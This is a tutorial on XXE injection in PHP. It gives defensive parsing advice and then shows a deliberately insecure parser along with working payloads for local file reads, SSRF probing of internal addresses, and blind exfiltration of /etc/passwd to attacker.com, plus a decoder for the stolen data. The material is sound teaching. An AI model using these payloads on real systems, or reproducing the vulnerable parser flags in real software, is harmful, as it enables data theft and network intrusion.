Understanding and Exploiting XML External Entity (XXE) Vulnerabilities
XML External Entity (XXE) injection is a specific type of vulnerability that occurs when an XML parser insecurely processes external entity references within an XML document. Unlike standard XML injection, which often results in logic-based issues, XXE significantly expands the attack surface, potentially leading to unauthorized data access, server-side request forgery (SSRF), and denial of service.
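The primary defense against this vulnerability is to disable the resolution of external entities. In PHP applications using libxml, this was historically achieved by calling libxml_disable_entity_loader(true). As of PHP 8.0 that function is deprecated, because libxml 2.9.0 and later disable external entity loading by default; on those versions the remaining risk comes from explicitly passing flags such as LIBXML_NOENT to the parser.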
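The defense described above can be sketched as a small parsing helper. This is a minimal illustration, not a complete hardening guide: the function name parseUntrustedXml is hypothetical, and it assumes the application never needs DTDs in incoming documents, so any DOCTYPE is rejected outright.

```php
<?php
/**
 * Parse untrusted XML without resolving entities (hypothetical helper).
 * Assumption: legitimate requests never carry a DOCTYPE declaration.
 */
function parseUntrustedXml(string $xml): DOMDocument
{
    $doc = new DOMDocument();
    // Collect parse errors quietly instead of emitting PHP warnings.
    $previous = libxml_use_internal_errors(true);

    // LIBXML_NOENT and LIBXML_DTDLOAD are deliberately omitted;
    // LIBXML_NONET additionally forbids network access while parsing.
    $loaded = $xml !== '' && $doc->loadXML($xml, LIBXML_NONET);

    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if (!$loaded) {
        throw new InvalidArgumentException('Malformed XML');
    }
    // Entities can only be declared inside a DOCTYPE, so refuse it entirely.
    if ($doc->doctype !== null) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }
    return $doc;
}
```

Rejecting the DOCTYPE is a stricter policy than merely leaving entities unresolved; it trades compatibility with DTD-based clients for a smaller attack surface.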
Core XML Concepts
Document Type Definition (DTD)
A DTD defines the legal structure of an XML document, specifying the elements and attributes allowed. It also serves as the container where entities are declared.
Entity Types
Entities act as variables within XML. They are categorized into four main types:
- Internal Entities: Defined within the DTD for use inside the XML body.
<!DOCTYPE root [ <!ENTITY author "TechnicalWriter"> ]>
<root>&author;</root>
- External Entities: Defined using the SYSTEM or PUBLIC keyword to fetch content from a URI or local file.
<!DOCTYPE root [ <!ENTITY sysinfo SYSTEM "file:///etc/hostname"> ]>
<root>&sysinfo;</root>
- Parameter Entities: Used exclusively within the DTD. They are declared with a percent sign (%).
<!ENTITY % remote_dtd SYSTEM "http://attacker.com/evil.dtd">
%remote_dtd;
- Public Entities: Similar to external entities but identified by a formal public identifier.
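The distinction between internal and external general entities can be inspected from PHP through the DOM. The following is a rough sketch: describeEntity and $sampleXml are hypothetical names, and the document is parsed without LIBXML_NOENT so that the declarations are recorded but nothing is fetched. Parameter entities are not exposed through this map, so the sketch covers general entities only.

```php
<?php
// Sample document declaring one internal and one external general entity.
$sampleXml = <<<'XML'
<!DOCTYPE root [
  <!ENTITY author "TechnicalWriter">
  <!ENTITY sysinfo SYSTEM "file:///etc/hostname">
]>
<root>&author;</root>
XML;

/**
 * Report whether a general entity is declared as internal or external.
 * Hypothetical helper for illustration only.
 */
function describeEntity(string $xml, string $name): string
{
    $doc = new DOMDocument();
    // No LIBXML_NOENT: entity declarations are parsed, but not substituted.
    $doc->loadXML($xml, LIBXML_NONET);

    if ($doc->doctype === null) {
        return 'undeclared';
    }
    $entity = $doc->doctype->entities->getNamedItem($name);
    if (!$entity instanceof DOMEntity) {
        return 'undeclared';
    }
    // External entities carry a system identifier; internal ones do not.
    return $entity->systemId === null ? 'internal' : 'external';
}

echo describeEntity($sampleXml, 'author'), "\n";
echo describeEntity($sampleXml, 'sysinfo'), "\n";
```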
Exploitation Scenarios
To demonstrate these vulnerabilities, consider a PHP backend that processes raw XML input:
<?php
// Enable external entity loading for demonstration purposes.
// Only needed before PHP 8.0; the call is deprecated from 8.0 onward.
libxml_disable_entity_loader(false);
$raw_xml = file_get_contents('php://input');
$xml_doc = new DOMDocument();
// LIBXML_NOENT substitutes entities; LIBXML_DTDLOAD loads the external DTD subset
$xml_doc->loadXML($raw_xml, LIBXML_NOENT | LIBXML_DTDLOAD);
$parsed_data = simplexml_import_dom($xml_doc);
echo $parsed_data;
?>
1. Arbitrary File Disclosure (In-band)
If the application echoes the parsed XML content back to the user, an attacker can read sensitive files directly.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request [
<!ENTITY sensitive SYSTEM "file:///C:/windows/win.ini">
]>
<request>&sensitive;</request>
2. Handling Special Characters with CDATA
Reading files that contain characters such as <, >, or & usually causes a parse error, because the parser treats the substituted content as markup. To bypass this, attackers combine parameter entities with an external DTD to wrap the content in a CDATA block.
Payload:
<!DOCTYPE data [
<!ENTITY % source SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">
<!ENTITY % dtd SYSTEM "http://attacker.com/wrapper.dtd">
%dtd;
]>
<data>&all;</data>
External DTD (wrapper.dtd):
<!ENTITY all "<![CDATA[%source;]]>">
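The payload above reads the file through the php://filter wrapper, which Base64-encodes the content before it is substituted. A small local experiment shows why that encoding matters for files containing markup characters. The temporary file and its content are hypothetical stand-ins for config.php; no XML parsing is involved.

```php
<?php
// Hypothetical stand-in for config.php, written to a temporary file.
$path = tempnam(sys_get_temp_dir(), 'xxe');
$content = '$db_pass = "p<ss&w>rd";' . "\n";
file_put_contents($path, $content);

// Same stream wrapper as in the payload: the file is Base64-encoded as it is read.
$encoded = file_get_contents(
    'php://filter/read=convert.base64-encode/resource=' . $path
);
unlink($path);

// Base64 output uses only A-Z, a-z, 0-9, '+', '/' and '=',
// so it contains no '<', '>' or '&' for the parser to trip over.
$isXmlSafe = preg_match('/^[A-Za-z0-9+\/=]*$/', $encoded) === 1;

// Decoding recovers the original bytes.
$roundTrip = base64_decode($encoded, true);

var_dump($isXmlSafe, $roundTrip === $content);
```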
3. Server-Side Request Forgery (SSRF)
XXE can be leveraged to probe the internal network. By targeting internal IP addresses and ports, an attacker can map the infrastructure or identify hidden services.
<!DOCTYPE probe [
<!ENTITY port_scan SYSTEM "http://192.168.1.1:8080">
]>
<root>&port_scan;</root>
Observation of response latency or specific error messages helps determine if a port is open or a host is live.
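From the defender's side, a system identifier that points at a private or reserved address is a strong hint of an SSRF attempt. The check below is a simplified sketch: pointsAtPrivateAddress is a hypothetical helper, it only looks at literal IP addresses, and it makes no attempt to resolve hostnames.

```php
<?php
/**
 * Return true when an entity's system identifier targets a literal
 * private or reserved IP address (hypothetical helper).
 */
function pointsAtPrivateAddress(string $systemId): bool
{
    $host = parse_url($systemId, PHP_URL_HOST);

    // No host at all (e.g. file:///...) or a hostname rather than an IP:
    // this sketch does not resolve names, so it reports false.
    if (!is_string($host) || filter_var($host, FILTER_VALIDATE_IP) === false) {
        return false;
    }

    // With these flags filter_var() rejects private and reserved ranges,
    // so a failed validation means the address is internal.
    $public = filter_var(
        $host,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    );
    return $public === false;
}

var_dump(pointsAtPrivateAddress('http://192.168.1.1:8080'));
```

A production filter would also need to handle hostnames that resolve to internal addresses, which this sketch leaves out.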
4. Out-of-Band (Blind) XXE
When the application does not return the XML output, data must be exfiltrated to an external server. This requires a nested parameter entity technique.
Main Payload:
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % remote SYSTEM "http://attacker.com/exfiltrate.dtd">
%remote;
%exec;
%send;
]>
<root>BlindXXE</root>
External DTD (exfiltrate.dtd):
<!ENTITY % exec "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>">
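In this flow, the server reads the file, encodes it in Base64, and sends the result as a URL query parameter to the attacker's web server, where it appears in the access logs. The inner percent sign is written as &#x25; because a literal % is not allowed inside an entity value, and %send; can only be referenced after %exec; has been expanded to declare it.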
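Recovering the file from a logged request is then a matter of pulling out the data parameter and decoding it. The helper below is an illustrative sketch with a hypothetical name, decodeExfiltratedData; it assumes the request URL has already been extracted from the log line.

```php
<?php
/**
 * Decode the Base64 "data" query parameter of a logged request URL.
 * Returns null when the parameter is missing or not valid Base64.
 * Hypothetical helper for illustration only.
 */
function decodeExfiltratedData(string $requestUrl): ?string
{
    $query = parse_url($requestUrl, PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }

    parse_str($query, $params);
    if (!isset($params['data']) || !is_string($params['data'])) {
        return null;
    }

    // URL decoding turns '+' into a space; restore it before decoding.
    $base64 = str_replace(' ', '+', $params['data']);

    $decoded = base64_decode($base64, true);
    return $decoded === false ? null : $decoded;
}

$line = "root:x:0:0:root:/root:/bin/bash\n";
$url = 'http://attacker.com/?data=' . base64_encode($line);
var_dump(decodeExfiltratedData($url) === $line);
```

The space-to-plus substitution matters because Base64 output may contain '+', which the payload places in the URL without percent-encoding.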